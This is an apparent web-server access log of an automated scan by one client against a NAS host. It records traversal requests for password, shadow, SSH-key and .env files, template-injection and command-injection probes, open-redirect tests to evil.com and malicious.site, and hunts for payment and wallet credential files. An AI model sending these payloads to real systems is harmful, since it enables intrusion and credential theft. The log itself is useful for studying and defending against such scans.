+[21/Jan/2026:01:25:35 +0000] - 404 404 - GET https nas.profibot.hu "/etc/apache2/apache2.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - - 403 - GET https nas.profibot.hu "/?lang=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - - 403 - GET https nas.profibot.hu "/redirect?url=http://evil.com" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - 403 403 - GET https nas.profibot.hu "/.svn/dir-props" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - 404 404 - GET https nas.profibot.hu "/ota/update.manifest" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - 404 404 - GET https nas.profibot.hu "/wp-admin/setup-config.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - 404 404 - GET https nas.profibot.hu "/storage/framework/cache/data/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - 404 404 - GET https nas.profibot.hu "/actuator/prometheus" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - 403 403 - GET https nas.profibot.hu "/.well-known/stripe/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - 404 404 - GET https nas.profibot.hu "/coinbase-commerce.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:35 +0000] - - 403 - GET https nas.profibot.hu "/?data=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - 404 404 - GET https nas.profibot.hu "/edge/manifest.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - - 403 - GET https nas.profibot.hu "/?content=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - - 403 - GET https nas.profibot.hu "/?action=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - 404 404 - GET https nas.profibot.hu "/routing/fallback_map.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - 404 404 - GET https nas.profibot.hu "/test?input={{range.__class__}}" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - 404 404 - GET https nas.profibot.hu "/optimizely/experiment.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - 404 404 - GET https nas.profibot.hu "/api/v1/users" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - 404 404 - GET https nas.profibot.hu "/var" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - - 403 - GET https nas.profibot.hu "/?section=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - 404 404 - GET https nas.profibot.hu "/api/users/123" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - 404 404 - GET https nas.profibot.hu "/config.php.save" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - - 403 - GET https nas.profibot.hu "/?view=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - 404 404 - GET https nas.profibot.hu "/debug?xss={{constructor.constructor(%27whoami%27)()}}" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - 404 404 - GET https nas.profibot.hu "/ansible/playbook.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - 403 403 - GET https nas.profibot.hu "/..%255c..%255c..%255c..%255c..%255c..%255cetc/hostname" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - - 403 - GET https nas.profibot.hu "/?folder=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - - 403 - GET https nas.profibot.hu "/?read=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - 404 404 - GET https nas.profibot.hu "/test-api/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - 404 404 - GET https nas.profibot.hu "/nginx/sites-enabled/default" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - 404 404 - GET https nas.profibot.hu "/WEB-INF/web.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - 404 404 - GET https nas.profibot.hu "/test.php?test=whoami" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - 404 404 - GET https nas.profibot.hu "/usr/lib/pine.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:36 +0000] - 404 404 - GET https nas.profibot.hu "/metrics/internal" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:37 +0000] - 404 404 - GET https nas.profibot.hu "/cryptomus-credentials.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:37 +0000] - 404 404 - GET https nas.profibot.hu "/teamcity/settings.kts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:37 +0000] - 200 200 - GET https nas.profibot.hu "/?tpl={{constructor.constructor(%27whoami%27)()}}" [Client 185.177.72.49] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:37 +0000] - 404 404 - GET https nas.profibot.hu "/queue/email_worker.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:37 +0000] - - 403 - GET https nas.profibot.hu "/?path=http://" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:37 +0000] - 404 404 - GET https nas.profibot.hu "/emulator/emulator.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:37 +0000] - 404 404 - GET https nas.profibot.hu "/multi_gateway/settings.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:37 +0000] - 404 404 - GET https nas.profibot.hu "/auto-update/settings.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:37 +0000] - 404 404 - GET https nas.profibot.hu "/combine?token=abc&jwt=xyz" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:37 +0000] - 403 403 - GET https nas.profibot.hu "/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%afwindows/system32/config/SAM" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:37 +0000] - - 403 - GET https nas.profibot.hu "/?page=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:37 +0000] - 404 404 - GET https nas.profibot.hu "/employee/4/benefits" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:37 +0000] - 404 404 - GET https nas.profibot.hu "/mail/imap.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:37 +0000] - - 403 - GET https nas.profibot.hu "/?source=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:37 +0000] - 404 404 - GET https nas.profibot.hu "/testenv/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:37 +0000] - 404 404 - GET https nas.profibot.hu "/grafana.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:37 +0000] - 404 404 - GET https nas.profibot.hu "/babel.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:37 +0000] - 404 404 - GET https nas.profibot.hu "/logs/finance_audit.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:37 +0000] - 404 404 - GET https nas.profibot.hu "/uat/payments/testcards.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:37 +0000] - 404 404 - GET https nas.profibot.hu "/js/?callback=alert(1)" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - 404 404 - GET https nas.profibot.hu "/undefined" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - 403 403 - GET https nas.profibot.hu "/.dvc/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - 403 403 - GET https nas.profibot.hu "/..%255c..%255c..%255c..%255c..%255c..%255cetc/php.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - 404 404 - GET https nas.profibot.hu "/binance-pay.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - 404 404 - GET https nas.profibot.hu "/escrow/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - - 403 - GET https nas.profibot.hu "/?view=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - 404 404 - GET https nas.profibot.hu "/eleventy.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - 404 404 - GET https nas.profibot.hu "/gripper/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - 404 404 - GET https nas.profibot.hu "/checkout/payment_links.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - - 403 - GET https nas.profibot.hu "/?content=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - 404 404 - GET https nas.profibot.hu "/etc/shadow" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - 404 404 - GET https nas.profibot.hu "/documentation-old/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - 403 403 - GET https nas.profibot.hu "/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%afvar/log/nginx/access.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - 404 404 - GET https nas.profibot.hu "/config/chain.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - - 403 - GET https nas.profibot.hu "/?config=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - 404 404 - GET https nas.profibot.hu "/wallets/multisig_policy.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - 404 404 - GET https nas.profibot.hu "/admin/auth" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - - 403 - GET https nas.profibot.hu "/?doc=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - 404 404 - GET https nas.profibot.hu "/src/config/coinbase.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - 404 404 - GET https nas.profibot.hu "/saleor/config.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - 404 404 - GET https nas.profibot.hu "/xkeysib.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - 404 404 - GET https nas.profibot.hu "/freshworks/mail/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:38 +0000] - 404 404 - GET https nas.profibot.hu "/crypto/wallet_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - 404 404 - GET https nas.profibot.hu "/secret.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - 404 404 - GET https nas.profibot.hu "/_site/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - - 403 - GET https nas.profibot.hu "/?view=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - 404 404 - GET https nas.profibot.hu "/key.pem" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - - 403 - GET https nas.profibot.hu "/?file=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - 404 404 - GET https nas.profibot.hu "/cpanel" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - 404 404 - GET https nas.profibot.hu "/usr/share/webmin/sendmail/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - 404 404 - GET https nas.profibot.hu "/typo3/index.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - 404 404 - GET https nas.profibot.hu "/consul/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - 404 404 - GET https nas.profibot.hu "/checkout/fulfill.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - 404 404 - GET https nas.profibot.hu "/src/config/paypal.ts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - 404 404 - GET https nas.profibot.hu "/chargebee/settings.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - 404 404 - GET https nas.profibot.hu "/merchant_accounts/api_keys.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - 404 404 - GET https nas.profibot.hu "/privkey.pem" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - 404 404 - GET https nas.profibot.hu "/firefox-addon/settings.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - 404 404 - GET https nas.profibot.hu "/pbs.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - 404 404 - GET https nas.profibot.hu "/api/docs/swagger.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - 404 404 - GET https nas.profibot.hu "/razorpay/keys.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - 404 404 - GET https nas.profibot.hu "/zoho/mail/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - 404 404 - GET https nas.profibot.hu "/gatsby-node.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - 404 404 - GET https nas.profibot.hu "/servlet/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - 404 404 - GET https nas.profibot.hu "/yoomoney/credentials.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:39 +0000] - 404 404 - GET https nas.profibot.hu "/////////////proc/self/environ" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - 403 403 - GET https nas.profibot.hu "/.svn/all-wcprops" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - 404 404 - GET https nas.profibot.hu "/admin/tools/request?cmd=whoami" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - 404 404 - GET https nas.profibot.hu "/slydepay/creds.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - 403 403 - GET https nas.profibot.hu "/.stripe/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - - 403 - GET https nas.profibot.hu "/?forward=http://" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - 404 404 - GET https nas.profibot.hu "/mail/error.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - - 403 - GET https nas.profibot.hu "/?lang=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - 404 404 - GET https nas.profibot.hu "/giftcards/config.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - - 403 - GET https nas.profibot.hu "/oauth/authorize?response_type=token&client_id=public-client&redirect_uri=http://malicious.site" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - 404 404 - GET https nas.profibot.hu "/controller/mapping.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - 404 404 - GET https nas.profibot.hu "/web.debug.config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - 404 404 - GET https nas.profibot.hu "/config/email.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - 403 403 - GET https nas.profibot.hu "/.vscode/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - 404 404 - GET https nas.profibot.hu "/1password/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - 404 404 - GET https nas.profibot.hu "/playground" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - 404 404 - GET https nas.profibot.hu "/themes/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - - 403 - GET https nas.profibot.hu "/?include=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - 404 404 - GET https nas.profibot.hu "/game/server.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - 403 403 - GET https nas.profibot.hu "/stripe/.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - 404 404 - GET https nas.profibot.hu "/etc/opendkim/keys/default.private" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - 404 404 - GET https nas.profibot.hu "/retail/devices/payment_profiles.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - 404 404 - GET https nas.profibot.hu "/opt/zimbra/conf/zimbra.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:40 +0000] - 404 404 - GET https nas.profibot.hu "/checkout/config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:41 +0000] - 404 404 - GET https nas.profibot.hu "/contracts/foundry.toml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:41 +0000] - 404 404 - GET https nas.profibot.hu "/cowrie/cowrie.cfg" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:41 +0000] - 200 200 - GET https nas.profibot.hu "/?page=....//....//....//etc/passwd" [Client 185.177.72.49] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:41 +0000] - 404 404 - GET https nas.profibot.hu "/auth/mail/login_policies.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:41 +0000] - - 403 - GET https nas.profibot.hu "/?content=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:41 +0000] - 404 404 - GET https nas.profibot.hu "/binancepay.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:41 +0000] - - 403 - GET https nas.profibot.hu "/?theme=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:41 +0000] - 404 404 - GET https nas.profibot.hu "/pci/safe_token_store.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:41 +0000] - 404 404 - GET https nas.profibot.hu "/prestashop/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:41 +0000] - - 403 - GET https nas.profibot.hu "/?asset=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:41 +0000] - 404 404 - GET https nas.profibot.hu "/auth/code_exchange" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:41 +0000] - 404 404 - GET https nas.profibot.hu "/sql.bak" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:41 +0000] - 404 404 - GET https nas.profibot.hu "/admin/proxy" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:41 +0000] - - 403 - GET https nas.profibot.hu "/?theme=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:41 +0000] - 404 404 - GET https nas.profibot.hu "/iotedge/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" 